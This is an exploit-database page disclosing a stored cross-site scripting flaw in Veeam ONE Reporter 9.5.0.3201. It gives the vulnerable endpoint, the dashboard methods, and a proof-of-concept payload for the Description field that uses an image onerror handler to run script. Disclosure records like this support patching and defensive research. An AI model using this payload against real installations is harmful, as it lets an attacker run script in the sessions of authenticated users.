header-logo
Suggest Exploit
vendor:
Veeam ONE Reporter
by:
Seyed Sadegh Khatami
8.8
CVSS
HIGH
Stored XSS
79
CWE
Product Name: Veeam ONE Reporter
Affected Version From: 9.5.0.3201
Affected Version To: 9.5.0.3201
Patch Exists: NO
Related CWE: N/A
CPE: a:veeam:veeam_one_reporter:9.5.0.3201
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows Server 2016
2019

Veeam ONE Reporter – Stored Cross-site Scripting (Stored XSS)

Veeam ONE Reporter is vulnerable to stored cross-site scripting (XSS). An attacker can inject malicious JavaScript code into the Description field of the addDashboard or editDashboard methods of the CommonDataHandlerReadOnly.ashx page. This code will be executed when the page is viewed by an authenticated user.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the Description field.
Source

Exploit-DB raw data:

# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016


#exploit:

Path: /CommonDataHandlerReadOnly.ashx 

method: addDashboard / editDashboard

SET Description(config) field to “AAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”

Navigation

Suggest Exploit

Services By CQR